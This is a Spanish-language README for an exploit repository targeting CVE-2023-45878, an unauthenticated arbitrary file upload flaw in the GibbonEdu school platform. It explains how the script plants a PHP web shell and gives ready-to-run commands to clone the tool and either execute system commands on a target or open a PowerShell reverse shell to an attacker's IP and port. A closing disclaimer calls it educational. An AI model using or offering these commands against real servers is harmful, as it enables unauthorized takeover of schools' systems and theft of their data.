
GibbonEdu Escritura Arbitraria de Archivos a Ejecución Remota de Código
GibbonEdu: Escritura arbitraria de archivos para ejecución de una web shell
Este repositorio contiene un exploit para CVE-2023-45878, una vulnerabilidad de escritura arbitraria de archivos en GibbonEdu. La vulnerabilidad afecta al endpoint rubrics_visualise_saveAjax.php y permite a un atacante no autenticado subir archivos arbitrarios al servidor web.
Este script aprovecha la vulnerabilidad para subir una web shell PHP y, o bien:
El script admite dos modos de funcionamiento:
--command (-c): Ejecutar un comando de sistema específico de forma remota.--shell (-s): Activar una reverse shell de PowerShell hacia el listener del atacante.git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
Este script tiene fines exclusivamente educativos. El uso no autorizado de este exploit en sistemas sin permiso es ilegal. El autor no se hace responsable de ningún uso indebido o daño causado por este exploit.